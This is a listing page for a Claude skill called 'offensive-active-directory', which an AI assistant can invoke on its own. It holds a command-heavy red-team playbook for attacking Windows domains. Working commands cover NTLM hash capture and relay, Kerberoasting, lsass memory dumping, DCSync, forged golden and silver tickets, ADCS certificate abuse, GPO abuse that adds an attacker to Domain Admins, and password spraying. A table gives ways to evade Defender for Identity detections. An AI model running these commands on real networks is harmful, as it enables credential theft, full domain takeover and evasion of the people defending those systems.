Stats
Actions
Tags
From cybersec-toolkit
Active Directory red team methodology covering recon (BloodHound, PowerView), credential abuse (Kerberoasting, NTLM relay), escalation, lateral movement, persistence, ADCS abuse, and Defender evasion.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersec-toolkit:offensive-active-directoryThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
1. Recon AD structure offline (BloodHound, ADExplorer snapshot) — minimize live queries
# SharpHound (CSharp collector) — most stealthy with throttling
SharpHound.exe -c All,GPOLocalGroup --Throttle 1000 --Jitter 30 --ZipFileName recon.zip
# Stealth collection (DC-only, avoids workstation noise)
SharpHound.exe -c DCOnly --Stealth
# Bloodhound.py from Linux (no Windows host needed)
bloodhound-python -d corp.local -u user -p pass -ns 10.0.0.1 -c All
# Domain enumeration without binaries
$d = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname
Get-DomainComputer -Unconstrained
Get-DomainGPO | ?{$_.gpcmachineextensionnames -match "Restricted Groups"}
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |
?{$_.ActiveDirectoryRights -match 'WriteDacl|GenericAll|WriteOwner'}
# Take snapshot from any low-priv user, analyze offline
ADExplorer.exe → File → Create Snapshot
# Convert to BloodHound format
ADExplorerSnapshot.py snapshot.dat -o output/
# Capture NetNTLMv2 hashes from broadcast resolution
responder -I eth0 -wrf
# Inveigh (Windows-side, when you have a foothold)
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTP Y
Crack with hashcat mode 5600. If cracking fails, relay instead.
# Identify relay targets (no SMB signing, LDAP signing not required)
nxc smb 10.0.0.0/24 --gen-relay-list relay-targets.txt
# Relay to LDAP/LDAPS for ACL abuse, ADCS for cert request
impacket-ntlmrelayx -tf relay-targets.txt -smb2support \
--escalate-user attacker --delegate-access
# Relay to ADCS Web Enrollment (ESC8) — requires HTTP endpoint up
impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp \
--adcs --template DomainController
# Request TGS for all SPN-bearing accounts
Rubeus.exe kerberoast /outfile:tgs.txt /nowrap
# AES-only accounts (harder to crack but worth attempting)
Rubeus.exe kerberoast /aes /outfile:tgs_aes.txt
# Cross-platform from Linux
impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.0.0.1 -request
hashcat -m 13100 tgs.txt rockyou.txt -r OneRuleToRuleThemAll.rule
# Find users with DONT_REQUIRE_PREAUTH set
impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.0.0.1 -no-pass
hashcat -m 18200 asrep.txt rockyou.txt
:: Modern, AV-friendly: comsvcs.dll minidump
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\out.dmp full
:: Task Manager → lsass.exe → Create dump file (GUI route, no binary drop)
:: nanodump (handle duplication, no MiniDumpWriteDump)
nanodump.exe --pid <PID> -w lsass.dmp --valid
Parse with Mimikatz or pypykatz offline:
pypykatz lsa minidump lsass.dmp
| Right | Abuse |
|---|---|
GenericAll / GenericWrite | Add SPN → Kerberoast; reset password; add member |
WriteDacl | Grant yourself DCSync rights, then DCSync |
WriteOwner | Take ownership → grant rights → exploit |
AllExtendedRights (User) | Force password change |
AllExtendedRights (Domain) | DCSync |
AddMember | Add self to privileged group |
WriteSPN | Set SPN, kerberoast target |
# Targeted Kerberoast (write SPN, roast, remove SPN)
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/SPN'}
Rubeus.exe kerberoast /user:victim
Set-DomainObject -Identity victim -Clear serviceprincipalname
# Grant DCSync via WriteDacl
Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' \
-PrincipalIdentity attacker -Rights DCSync
# Find delegation
Get-DomainComputer -Unconstrained
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# Unconstrained → wait for / coerce DC auth, capture TGT
Rubeus.exe monitor /interval:5 /nowrap
# Constrained (S4U2self/S4U2proxy) — impersonate any user to allowed SPN
Rubeus.exe s4u /user:svc_acct /rc4:<hash> /impersonateuser:Administrator \
/msdsspn:cifs/dc.corp.local /ptt
# Resource-Based Constrained Delegation (RBCD) — write msDS-AllowedToActOnBehalfOfOtherIdentity
# Requires GenericAll/GenericWrite on the target computer object
| Technique | Tool / RPC |
|---|---|
| PetitPotam | MS-EFSRPC (EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv) |
| PrinterBug | MS-RPRN (RpcRemoteFindFirstPrinterChangeNotificationEx) |
| DFSCoerce | MS-DFSNM (NetrDfsRemoveStdRoot) |
| ShadowCoerce | MS-FSRVP |
| WebDAV | Search-and-replace UNC path embedded in any web fetch |
# Coerce + relay full chain
impacket-ntlmrelayx -t ldap://dc -smb2support --delegate-access &
PetitPotam.py -u low -p pass attacker-ip dc-ip
# Result: RBCD set, S4U → DA on coerced machine
# Find GPOs you can edit
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs |
?{ $_.SecurityIdentifier -eq (Get-DomainUser current).objectsid `
-and $_.ActiveDirectoryRights -match 'WriteProperty|WriteDacl' }
# SharpGPOAbuse — add scheduled task / immediate task to GPO
SharpGPOAbuse.exe --AddComputerTask --TaskName Update --Author NT\System \
--Command cmd.exe --Arguments "/c net group 'Domain Admins' attacker /add /domain" \
--GPOName "Workstation Policy"
certipy find -u [email protected] -p pass -dc-ip 10.0.0.1 -vulnerable -stdout
| ID | Misconfig | Exploitation |
|---|---|---|
| ESC1 | Client Auth + ENROLLEE_SUPPLIES_SUBJECT | Request cert with arbitrary UPN |
| ESC2 | Any Purpose EKU | Request cert valid for any use |
| ESC3 | Enrollment Agent | Request agent cert, then on-behalf-of any user |
| ESC4 | Vulnerable template ACL | Modify template to ESC1 |
| ESC6 | EDITF_ATTRIBUTESUBJECTALTNAME2 on CA | SAN injection on any template |
| ESC7 | Vulnerable CA ACL (ManageCA) | Approve own pending requests |
| ESC8 | Web Enrollment HTTP + no EPA | NTLM relay → cert |
| ESC9 | No security extension + UPN | UPN spoofing post-account-rename |
| ESC10 | StrongCertificateBindingEnforcement weak | UPN spoofing without rename |
| ESC11 | RPC unprotected (no ICertPassage IF_ENFORCEENCRYPTICERTREQUEST) | Relay over RPC |
| ESC13 | Issuance policy linked to group | Cert grants group membership |
| ESC14 | altSecurityIdentities write | Map attacker cert to admin |
| ESC15 | EKUwu — schema v1 templates | Inject EKU at request time |
# Request cert as Administrator
certipy req -u [email protected] -p pass -ca CORP-CA -template VulnTemplate \
-upn [email protected]
# Use cert to get TGT and NT hash via UnPAC-the-Hash
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1
# Coerce any DC, relay to ADCS Web Enrollment, request DC cert
impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp \
--adcs --template DomainController &
PetitPotam.py attacker-ip dc.corp.local
# Result: cert for DC$ → TGT → DCSync
# PTH with NT hash
nxc smb 10.0.0.0/24 -u admin -H <NThash> --local-auth
impacket-psexec corp/admin@target -hashes :<NThash>
# Overpass-the-Hash (NT hash → TGT, useful for Kerberos-only targets)
Rubeus.exe asktgt /user:admin /rc4:<NThash> /ptt
# Inject TGT
Rubeus.exe ptt /ticket:base64.kirbi
# Or from .ccache
KRB5CCNAME=admin.ccache impacket-secretsdump -k -no-pass dc.corp.local
# WinRM (no event logs in default channel for command exec)
evil-winrm -i target -u admin -H <hash>
# SMB exec without service creation (uses task scheduler)
impacket-atexec corp/admin@target -hashes :<hash> "whoami"
# WMI
impacket-wmiexec corp/admin@target -hashes :<hash>
# DCOM (MMC20.Application, ShellWindows, ShellBrowserWindow)
Invoke-DCOM -ComputerName target -Method MMC20 -Command "calc.exe"
# Requires krbtgt NT hash (from DCSync)
impacket-ticketer -nthash <krbtgt-NT> -domain-sid S-1-5-21-... -domain corp.local Administrator
KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass dc.corp.local
# Forge TGS for a specific service using its account hash
impacket-ticketer -nthash <svc-NT> -domain-sid <SID> -domain corp.local \
-spn cifs/server.corp.local Administrator
# Diamond — modify legitimate TGT in-flight (no krbtgt hash on wire)
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512
impacket-secretsdump -just-dc-user 'corp/krbtgt' corp/admin@dc -hashes :<hash>
# In-memory PowerShell variant (Mimikatz)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'
mimikatz # !+
mimikatz # !processtoken
mimikatz # lsadump::dcshadow /object:CN=victim,... /attribute:primaryGroupID /value:519
mimikatz # lsadump::dcshadow /push
Add ACE granting your account GenericAll on CN=AdminSDHolder,CN=System,DC=corp,DC=local. SDProp propagates to all protected groups every 60 minutes.
# Map trusts
Get-DomainTrust -SearchBase "DC=corp,DC=local"
Get-ForestTrust
# SID History injection (cross-forest if SID filtering disabled)
# ExtraSids in golden ticket → admin in trusted forest
impacket-ticketer -nthash <krbtgt> -domain-sid <child-SID> \
-extra-sid S-1-5-21-<parent>-519 -domain child.corp.local Administrator
# Trust ticket forging (inter-realm TGT)
Rubeus.exe asktgs /service:krbtgt/parent.local /ticket:trust-ticket.kirbi
| Pivot | Path |
|---|---|
| AAD Connect server compromise | Dump MSOL_ account → DCSync on-prem |
| Seamless SSO | Forge Kerberos ticket for AZUREADSSOACC$ → cloud SSO any user |
| PTA agent | DLL hijack Microsoft.Azure.SecurityTokenService → harvest cleartext |
| PHS hash sync | Read on-prem hashes from AAD Connect SQL (ADSync DB) |
| Federated trust | Forge SAML token via stolen ADFS token-signing cert (Golden SAML) |
| Pass-the-PRT | Steal PRT cookie from device → cloud session as user |
# AADInternals — Hybrid identity attack toolkit
Get-AADIntADSyncCredentials # Extract MSOL_ creds from AAD Connect
Open-AADIntOffice365Portal -AccessToken $token
New-AADIntSAMLToken -ImmutableID 'a==' -Issuer 'http://sts/adfs/services/trust' \
-PfxFileName 'token-signing.pfx'
| MDI Detector | Evasion |
|---|---|
| Honeytoken account access | Always check description and recent activity before hitting accounts |
| Reconnaissance via SAMR | Use ADWS / LDAP-only collection, throttle |
| Suspicious Kerberos delegation | Avoid noisy S4U2self chains on monitored DCs |
| Golden/Silver Ticket detection | Use Diamond/Sapphire variants; match legitimate ticket lifetime/encryption |
| DCSync from non-DC | Relay through legitimate replication-permitted accounts |
| Pass-the-Hash | Use overpass-the-hash to convert to Kerberos before lateraling |
# Identify MDI sensors before noisy actions
Get-DomainComputer -SPN '*MicrosoftATA*'
Get-DomainComputer | ?{ $_.servicePrincipalName -match 'AATPSensor' }
# 1. Anonymous LDAP enum (no creds)
ldapsearch -x -H ldap://dc -s base -b "" "(objectclass=*)"
nxc ldap dc -u '' -p '' --users
# 2. Null SMB session
nxc smb dc -u '' -p '' --shares
impacket-rpcclient -U '' dc -no-pass
# 3. Password spray (low and slow)
nxc smb dc -u users.txt -p 'Winter2025!' --continue-on-success
# 4. Once authed: full enum + BloodHound
bloodhound-python -d corp.local -u user -p pass -ns dc -c All --zip
# 5. Identify attack path → execute → loot → persist
npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkitProvides techniques for attacking Microsoft Active Directory environments, including reconnaissance, credential harvesting, Kerberos attacks, lateral movement, and privilege escalation for red team operations.
Provides BloodHound Cypher queries for Active Directory attacks: shortest paths to Domain Admin, Kerberoastable/AS-REP accounts, unconstrained delegation, high-value targets, and misconfigs. For AD pentesting.
Conducts an Active Directory penetration test: enumerate domain objects, discover attack paths with BloodHound, exploit Kerberos, escalate via ADCS/DCSync.